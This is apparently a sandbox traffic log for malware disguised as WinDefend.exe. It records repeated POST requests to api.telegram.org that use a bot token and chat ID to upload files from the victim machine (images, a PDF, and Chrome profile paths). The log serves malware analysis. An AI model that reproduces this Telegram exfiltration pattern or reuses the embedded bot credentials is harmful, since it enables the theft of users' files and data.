2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: 35 38 96 27 50 4d 79 88 71 aa 4b 39 7b e4 29 c1 f0 bb 5c 48 86 1f 6a 09 8f c2 74 9b 49 29 f0 8a de 99 e2 f9 8e 84 26 0d 69 ec e8 c8 9e 25 2e 5e fb 75 22 87 c4 77 82 b2 03 ab a7 e7 24 a3 c0 5f bd 66 f9 d0 f4 8b 4c 50 b9 03 c0 b8 ac 77 06 97 c3 eb ba 59 6d 53 79 1e 63 d7 1e 1a 60 8e e4 57 9c bd b0 10 31 bb d4 99 71 e7 9e 55 1b 6a 8d 4c d0 a3 f5 f3 51 84 66 06 6b d6 fc 73 03 b3 98 a5 d9 33 f5 0b 7b 48 b0 1b ec 23 59 e5 a9 c0 0c be bf 52 ab 97 83 fc 94 f9 62 1a ac 7d 66 90 06 1f 88 c2 f7 ed 8f 04 a5 3e ad a1 d5 03 1e 96 34 7f fe f6 98 27 be 51 f9 b5 04 f3 3f 25 9d 3b 22 b1 ee ac dc a9 1e 48 56 ca e7 0a 59 c5 9d 43 8f ce 90 f4 69 87 b6 1c 32 62 c0 da fb df cc ae 6a ef b5 b7 b2 ed 12 d6 d0 2e 5c 09 b2 b8 67 57 05 6b 96 f3 c4 0e 9e 8e af 29 cc 03 47 b2 62 ae 8b Data Ascii: 58'PMyqK9{)\HjtI)&i%.^u"w$_fLPwYmSyc`W1qUjLQfks3{H#YRb}f>4'Q?%;"HVYCi2bj.\gWk)Gb
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: 37 47 a0 70 04 47 ba bc 1a 5f f3 37 d5 64 79 f5 c2 26 4e b0 a7 16 e1 16 8c 22 8b 47 e7 a2 96 ca 9f 2d c1 dd 70 52 de 6c 38 9b 71 eb ed d3 ef 94 e9 d2 3d 65 7d f1 17 50 6a 71 70 0f 9b 12 37 f7 7c 0e 54 ab 2c bd fe ff 0a cf b4 1c 02 4a 9e ca 57 86 5a 9a 33 f9 97 25 79 d1 dd 42 1b 53 17 d1 73 d7 28 cf 31 97 e7 9b 78 74 9a f5 54 c5 bb 79 3d 16 9c 33 df e6 54 94 e1 a4 9e bf a8 d6 8a 65 8e 44 b5 69 25 c2 d6 cb 60 74 b4 70 5b 5f a6 36 9a 74 aa 6b dd f9 56 54 e3 3d e3 b1 7a 7e 87 79 e3 31 b8 0d 59 ca ce 6d 34 2a 69 b6 5f df 04 d5 6f bc 2b 99 ba 66 8d 1e 02 f3 a1 09 d5 04 5b 81 0a 8f 37 ae c9 42 01 4e f4 4e 42 e2 e9 0c bd 81 fa 02 ba 86 f4 e7 77 04 65 63 20 2b bb 87 35 c7 27 ec 70 aa 3b 3c b0 96 f1 a6 bb 06 0d 0c 4a ba 7b fe f3 01 c0 e5 18 77 4a 5e 78 ad 6f 1e ec Data Ascii: 7GpG_7dy&N"G-pRl8q=e}Pjqp7\|T,JWZ3%yBSs(1xtTy=3TeDi%`tp[_6tkVT=z~y1Ym4*i_o+f[7BNNBwec +5'p;<J{wJ^xo
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: 1f cd b2 e8 25 fb 9d 5d 0c 2a 2b 1e 78 fe 80 90 46 9e 9a f2 11 63 b5 b6 2a 4a ae 64 26 9d ca a5 8d 6b c2 1f 2d 80 b8 9a 2c 22 cb 63 e1 19 e1 fd 53 1e 1d fe 0a 6e f6 09 f7 37 8a 85 13 a4 11 22 5a 88 8a ff 18 9a a6 bf cc 3f c2 ce 0d e1 51 15 a4 95 1e e2 77 2e 28 ed 4b 39 8c 1f b6 42 53 d7 1c bb 0c 9c d6 5a 79 b4 0c 30 e5 bd e9 bb f9 04 ef b9 19 1b 4f 19 6c c2 20 7d 33 de a8 0d c7 78 95 c1 39 f9 fd b6 9f 05 ca 7a 8b 18 ea 61 1b 0f 2d 6c e1 c4 cf 64 e1 8e b4 ad 4b 58 e7 89 53 f2 05 f8 4f 2a af 53 ea 5d 09 41 10 85 a9 3c f6 8b 9c 7b 56 6e 36 fc 64 a2 e5 21 98 0e 8d 8a ac 92 66 a0 da 5e 49 ee fc bb 63 e0 bb f0 a6 a4 84 4f 48 a1 e7 fe 96 a6 14 97 7c 72 c9 08 9f 97 c0 ba 53 6d c6 89 5f 60 87 25 b9 42 9f df c9 36 a1 79 63 3f 21 5e e1 73 7e fb 3d 8a 4a 6e b7 0a cb Data Ascii: %]+xFcJd&k-,"cSn7"Z?Qw.(K9BSZy0Ol }3x9za-ldKXSO*S]A<{Vn6d!f^IcOH\|rSm_`%B6yc?!^s~=Jn
2024-05-23 13:34:43 UTC	4096	OUT	Data Raw: 20 33 10 34 f5 95 f9 1d 8c 0a 01 5f 0b 7a 56 d8 76 29 ed ef 54 f6 bd 1f 9d 83 d7 80 8c 0c fb ca c5 ed 95 9f e3 4a 14 d0 5f 02 33 37 d9 fd 9d 27 4d 8c d7 db 6f 81 56 7f 09 72 b3 c3 4b 08 12 a3 2c 24 af 2b e9 8c ac b8 7e 95 84 8d 21 70 60 37 e1 58 ad 1f 6f 2a ed 6b da 7a 41 e9 29 0c 64 af 23 37 b5 e6 1d ee cb 7a e9 83 63 88 be 08 1d 9c 11 ff d8 be 47 18 aa 4d fb 4b a8 0b 16 3c 15 fb f7 4a 0f 21 31 e3 49 5b 37 17 17 3b 6a c6 f5 0c fd bf 59 61 45 ac d1 3f e6 b3 8c 2b fd a4 46 e0 97 7e 24 76 30 8c 2a a2 1d 71 91 b6 98 19 8f 84 07 cf d7 8f da 97 df 4f be 42 2d ee 3e 93 3a 2d 83 ae 5b b6 ce 97 5b a0 89 f2 14 c8 c2 fb 13 14 94 1a 91 4b f9 23 30 6c 6b 49 d2 34 ff 86 db 69 c3 94 fd 34 0b 6f a1 48 ef 51 39 e5 9b 23 89 cb ba 08 ab 24 58 31 3b 0a 90 8b 44 cc 62 0d 1e Data Ascii: 34_zVv)TJ_37'MoVrK,$+~!p`7XokzA)d#7zcGMK<J!1I[7;jYaE?+F~$v0qOB->:-[[K#0lkI4i4oHQ9#$X1;Db
2024-05-23 13:34:43 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:43 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	61117	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:43 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:43 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+64.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:34:43 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:43 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	61118	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:43 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="3e07cba2-404a-415c-837b-d92400b847d0" Host: api.telegram.org Content-Length: 611 Expect: 100-continue
2024-05-23 13:34:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:43 UTC	40	OUT	Data Raw: 2d 2d 33 65 30 37 63 62 61 32 2d 34 30 34 61 2d 34 31 35 63 2d 38 33 37 62 2d 64 39 32 34 30 30 62 38 34 37 64 30 0d 0a Data Ascii: --3e07cba2-404a-415c-837b-d92400b847d0
2024-05-23 13:34:43 UTC	97	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 43 6c 6f 73 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 6c 6f 73 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Close.png; filename*=utf-8''Close.png
2024-05-23 13:34:43 UTC	289	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 0a 08 06 00 00 00 8d 32 cf bd 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 db 49 44 41 54 18 19 63 60 20 05 64 66 66 0a 16 14 14 04 a0 eb 01 8a 19 e4 e4 e4 68 80 c4 99 40 04 0b 0b 8b e4 ff ff ff 97 e6 e7 e7 e7 80 f8 20 00 54 64 04 14 3b cc ca ca aa 0e e2 33 82 08 10 00 2a b2 03 52 3b 81 38 8f 89 89 e9 04 48 11 90 5d 39 61 c2 84 e9 40 1a a1 10 c4 29 2c 2c 74 f9 f7 ef df 16 46 46 c6 1f 40 2e 5c 11 48 0e 6c 35 88 01 02 40 53 fe 01 15 81 6c e1 07 b2 99 c1 82 50 02 ce 01 5a 6d 03 14 db 09 54 37 0f 48 af 02 d2 fd e6 e6 e6 cf 4e 9e 3c 79 0e a4 16 ac 30 2f 2f 4f 15 28 71 14 c8 5f 31 71 e2 c4 b4 13 27 4e 1c b3 b0 b0 00 99 dc 63 65 65 75 01 c8 bf 09 b6 1a e8 f8 2f 40 c1 4a a0 a2 64 20 0d 06 40 Data Ascii: PNGIHDR2sRGBIDATc` dffh@ Td;3*R;8H]9a@),,tFF@.\Hl5@SlPZmT7HN<y0//O(q_1q'Nceeu/@Jd @
2024-05-23 13:34:43 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 33 65 30 37 63 62 61 32 2d 34 30 34 61 2d 34 31 35 63 2d 38 33 37 62 2d 64 39 32 34 30 30 62 38 34 37 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --3e07cba2-404a-415c-837b-d92400b847d0Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:43 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:43 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 33 65 30 37 63 62 61 32 2d 34 30 34 61 2d 34 31 35 63 2d 38 33 37 62 2d 64 39 32 34 30 30 62 38 34 37 64 30 2d 2d 0d 0a Data Ascii: --3e07cba2-404a-415c-837b-d92400b847d0--
2024-05-23 13:34:44 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:44 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	61120	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:45 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 175 Expect: 100-continue
2024-05-23 13:34:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:45 UTC	175	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 44 79 6e 61 6d 69 63 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 45 4e 55 25 35 43 44 79 6e 61 6d 69 63 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 35 35 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+Dynamic.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CENU%5CDynamic.pdf%0ASize%3A+55+KB
2024-05-23 13:34:45 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:45 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	61119	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:45 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="fc13998b-2668-43cd-9a22-6549072c4a27" Host: api.telegram.org Content-Length: 4152 Expect: 100-continue
2024-05-23 13:34:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:45 UTC	40	OUT	Data Raw: 2d 2d 66 63 31 33 39 39 38 62 2d 32 36 36 38 2d 34 33 63 64 2d 39 61 32 32 2d 36 35 34 39 30 37 32 63 34 61 32 37 0d 0a Data Ascii: --fc13998b-2668-43cd-9a22-6549072c4a27
2024-05-23 13:34:45 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=64.png; filename*=utf-8''64.png
2024-05-23 13:34:45 UTC	3836	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0e c3 49 44 41 54 78 9c ed 5b 79 8c 5e d5 75 ff 9d 73 df 7b f3 6d b3 9a f1 02 66 df 37 63 82 c5 a2 2a 74 21 81 80 c2 e6 c8 84 12 44 50 ab c0 1f 49 14 b5 80 1a 5c d5 fe 28 81 a6 40 53 b5 89 92 10 54 50 13 11 07 91 42 93 14 5a 13 02 16 09 2a c1 65 37 8b d3 52 ca 56 6c 6c 6c 8f ed 99 6f 79 f7 9e 5f ff 78 ef 9b 19 ec 59 be 6f 66 8c 2a c5 47 7a 92 e5 ef bd 73 cf fa 3b e7 9e 7b 07 d8 4f fb e9 b7 9a 64 9f 72 af 42 f1 f2 2c d7 38 11 44 15 36 47 12 7d 84 54 85 ce 15 2b ce 21 af 3d 69 9f 46 c0 01 2b 4f fb 98 2b c4 9f a2 d9 31 42 14 21 da 5a 74 c2 75 09 30 fb 87 81 a2 35 e7 b8 71 6b 93 0f a7 37 3f fd c2 be 92 71 9f 18 e0 c0 3b 4f 2b 2d ec 3d f4 1b 9b df d8 7c 4d Data Ascii: PNGIHDR@@iqIDATx[y^us{mf7ct!DPI\(@STPBZe7RVllloy_xYof*Gzs;{OdrB,8D6G}T+!=iF+O+1B!Ztu05qk7?q;O+-=\|M
2024-05-23 13:34:45 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 63 31 33 39 39 38 62 2d 32 36 36 38 2d 34 33 63 64 2d 39 61 32 32 2d 36 35 34 39 30 37 32 63 34 61 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --fc13998b-2668-43cd-9a22-6549072c4a27Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:45 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:45 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 63 31 33 39 39 38 62 2d 32 36 36 38 2d 34 33 63 64 2d 39 61 32 32 2d 36 35 34 39 30 37 32 63 34 61 32 37 2d 2d 0d 0a Data Ascii: --fc13998b-2668-43cd-9a22-6549072c4a27--
2024-05-23 13:34:46 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:45 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	61121	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:46 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 180 Expect: 100-continue
2024-05-23 13:34:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:46 UTC	180	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 43 6c 6f 73 65 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 43 6c 6f 73 65 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 36 33 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+Close2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5CClose2x.png%0ASize%3A+563+B
2024-05-23 13:34:46 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:46 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	61122	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:46 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="d9eb4d47-46b1-4135-94d1-fd710121077f" Host: api.telegram.org Content-Length: 57544 Expect: 100-continue
2024-05-23 13:34:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:46 UTC	40	OUT	Data Raw: 2d 2d 64 39 65 62 34 64 34 37 2d 34 36 62 31 2d 34 31 33 35 2d 39 34 64 31 2d 66 64 37 31 30 31 32 31 30 37 37 66 0d 0a Data Ascii: --d9eb4d47-46b1-4135-94d1-fd710121077f
2024-05-23 13:34:46 UTC	101	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 79 6e 61 6d 69 63 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 79 6e 61 6d 69 63 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Dynamic.pdf; filename*=utf-8''Dynamic.pdf
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 33 20 30 20 6f 62 6a 20 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 35 37 32 31 38 2f 4f 20 31 31 38 2f 45 20 31 30 31 32 30 2f 4e 20 36 2f 54 20 35 34 39 31 30 2f 48 20 5b 20 39 37 32 37 20 33 39 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 31 31 33 20 33 35 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 39 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 30 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 32 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 37 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 39 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 Data Ascii: %PDF-1.6%113 0 obj <</Linearized 1/L 57218/O 118/E 10120/N 6/T 54910/H [ 9727 393]>>endobj xref113 350000000016 00000 n0000000996 00000 n0000001108 00000 n0000001322 00000 n0000001376 00000 n0000001397 00000 n00000
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 45 c5 1e 6d e7 a6 da 71 e3 b9 a8 9d 77 d4 94 cb 9b 0e 9e c9 23 41 8b 3a 29 e4 05 5f 11 f0 8c 44 62 d4 41 c1 ac 32 73 9c 3f 43 ee fc 43 06 2f 64 d4 49 ee 3a 35 2b a1 59 4d 80 86 04 68 6c 59 06 5e 06 4e bc 11 34 87 aa bd d2 02 bc aa c7 76 b9 f3 95 eb 92 c5 e9 41 66 02 a5 8e 3b af c3 2f 4c 40 f9 04 0f be 54 52 60 f3 10 04 90 02 12 0f 10 20 6b 34 df 1e 7d 80 92 58 14 af 79 82 3e 00 21 5d a0 a3 dc c3 de 80 a7 86 05 d7 eb 6f 46 9f 36 da 20 17 e4 be db c6 89 11 1c d5 73 27 f4 38 70 06 1e b7 db 4a 8f 5a 34 fc 6b 57 09 58 08 f3 9f 4c 81 b9 e8 59 f0 4b c4 7a fb 27 ee d9 c5 d4 06 12 d5 67 da ce dc a6 a7 ce 6e f6 b3 fb cc 15 b9 23 27 d6 c7 97 08 e5 0b 4e 65 80 8f 0e 06 1f e3 a5 13 20 7f c8 e3 16 59 81 cf 4f 3a 47 ce d6 9e 8f 2e cd 38 13 5b e1 06 f2 e1 23 39 e4 53 1a Data Ascii: Emqw#A:)_DbA2s?CC/dI:5+YMhlY^N4vAf;/L@TR` k4}Xy>!]oF6 s'8pJZ4kWXLYKz'gn#'Ne YO:G.8[#9S
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 20 30 20 6f 62 6a 3c 3c 2f 4a 53 28 5c 6e 65 76 65 6e 74 2e 76 61 6c 75 65 20 3d 20 5c 28 6e 65 77 20 44 61 74 65 5c 28 5c 29 5c 29 2e 74 6f 53 74 72 69 6e 67 5c 28 5c 29 3b 5c 72 5c 6e 41 46 44 61 74 65 5f 46 6f 72 6d 61 74 45 78 5c 28 22 68 3a 4d 4d 20 74 74 2c 20 6d 6d 6d 20 64 64 2c 20 79 79 79 79 22 5c 29 3b 5c 72 29 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 33 36 20 30 20 6f 62 6a 5b 5d 0d 65 6e 64 6f 62 6a 0d 31 33 37 20 30 20 6f 62 6a 5b 30 20 31 5d 0d 65 6e 64 6f 62 6a 0d 31 33 38 20 30 20 6f 62 6a 3c 3c 2f 43 30 5b 30 2e 38 39 38 30 33 20 30 2e 39 34 39 30 31 20 31 5d 2f 44 6f 6d 61 69 6e 5b 30 20 31 5d 2f 4e 20 31 2e 30 30 38 31 38 2f 43 31 5b 30 2e 37 39 32 31 34 20 30 2e 38 31 31 37 35 20 30 2e 38 39 30 31 38 5d Data Ascii: 0 obj<</JS(\nevent.value = $new Date\($\).toString;\r\nAFDate_FormatEx$"h:MM tt, mmm dd, yyyy"$;\r)/S/JavaScript>>endobj136 0 obj[]endobj137 0 obj[0 1]endobj138 0 obj<</C0[0.89803 0.94901 1]/Domain[0 1]/N 1.00818/C1[0.79214 0.81175 0.89018]
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: e7 cc bc 3a 09 29 b5 4d b9 af ba 35 a6 ea 58 54 2a fd 5c 4e b9 1b df 96 b2 4f c0 cf bf 3c df fd 4f 80 01 00 fa 12 d7 3e 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 34 20 30 20 6f 62 6a 5b 5d 0d 65 6e 64 6f 62 6a 0d 35 20 30 20 6f 62 6a 5b 30 20 31 5d 0d 65 6e 64 6f 62 6a 0d 36 20 30 20 6f 62 6a 3c 3c 2f 43 30 5b 30 2e 38 39 38 30 33 20 30 2e 39 34 39 30 31 20 31 5d 2f 44 6f 6d 61 69 6e 5b 30 20 31 5d 2f 4e 20 31 2e 30 30 38 31 38 2f 43 31 5b 30 2e 37 39 32 31 34 20 30 2e 38 31 31 37 35 20 30 2e 38 39 30 31 38 5d 2f 46 75 6e 63 74 69 6f 6e 54 79 70 65 20 32 3e 3e 0d 65 6e 64 6f 62 6a 0d 37 20 30 20 6f 62 6a 5b 36 20 30 20 52 5d 0d 65 6e 64 6f 62 6a 0d 38 20 30 20 6f 62 6a 3c 3c 2f 44 6f 6d 61 69 6e 5b 30 20 31 5d 2f 42 6f 75 6e 64 73 20 34 20 Data Ascii: :)M5XT*\NO<O>endstreamendobj4 0 obj[]endobj5 0 obj[0 1]endobj6 0 obj<</C0[0.89803 0.94901 1]/Domain[0 1]/N 1.00818/C1[0.79214 0.81175 0.89018]/FunctionType 2>>endobj7 0 obj[6 0 R]endobj8 0 obj<</Domain[0 1]/Bounds 4
